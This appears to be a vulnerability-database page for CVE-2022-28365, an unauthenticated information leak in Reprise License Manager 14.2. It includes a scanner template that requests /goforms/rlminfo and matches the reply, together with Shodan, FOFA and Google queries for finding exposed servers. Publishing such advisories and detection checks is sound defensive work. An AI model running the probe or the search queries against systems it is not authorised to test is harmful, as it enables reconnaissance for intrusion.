CVE-2022-28365: Reprise License Manager 14.2 - Information Disclosure

日期: 2025-08-01 | 影响软件: Reprise License Manager 14.2 | POC: 已公开

漏洞描述

Reprise License Manager 14.2 is susceptible to information disclosure via a GET request to /goforms/rlminfo. No authentication is required. The information disclosed is associated with software versions, process IDs, network configuration, hostname(s), system architecture and file/directory information. An attacker can possibly obtain further sensitive information, modify data, and/or execute unauthorized operations.

PoC代码[已公开]

id: CVE-2022-28365

info:
  name: Reprise License Manager 14.2 - Information Disclosure
  author: Akincibor
  severity: medium
  description: |
    Reprise License Manager 14.2 is susceptible to information disclosure via a GET request to /goforms/rlminfo. No authentication is required. The information disclosed is associated with software versions, process IDs, network configuration, hostname(s), system architecture and file/directory information. An attacker can possibly obtain further sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can exploit this vulnerability to gain sensitive information.
  remediation: |
    Apply the latest security patch or upgrade to a non-vulnerable version of Reprise License Manager.
  reference:
    - https://www.reprisesoftware.com/products/software-license-management.php
    - https://github.com/advisories/GHSA-4g2v-6x25-vr7p
    - http://packetstormsecurity.com/files/166647/Reprise-License-Manager-14.2-Cross-Site-Scripting-Information-Disclosure.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-28365
    - https://www.reprisesoftware.com/RELEASE_NOTES
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-28365
    cwe-id: CWE-425
    epss-score: 0.35995
    epss-percentile: 0.96984
    cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: reprisesoftware
    product: reprise_license_manager
    shodan-query:
      - http.html:"reprise license"
      - http.html:"reprise license manager"
    fofa-query:
      - body="reprise license manager"
      - body="reprise license"
    google-query: inurl:"/goforms/menu"
  tags: cve,cve2022,rlm,packetstorm,exposure,reprisesoftware

http:
  - method: GET
    path:
      - "{{BaseURL}}/goforms/rlminfo"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "RLM Version"
          - "Platform type"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ea2a5bf9abeddb7c53087eba55b060f7eee23271dc661d518f03da8221624c5e022020dfa235b65316a28139eeaa1d31fb47b52cfbed508c6a29f7f712fdd34dcac0:922c64590222798bb761d5b6d8e72950

相关漏洞推荐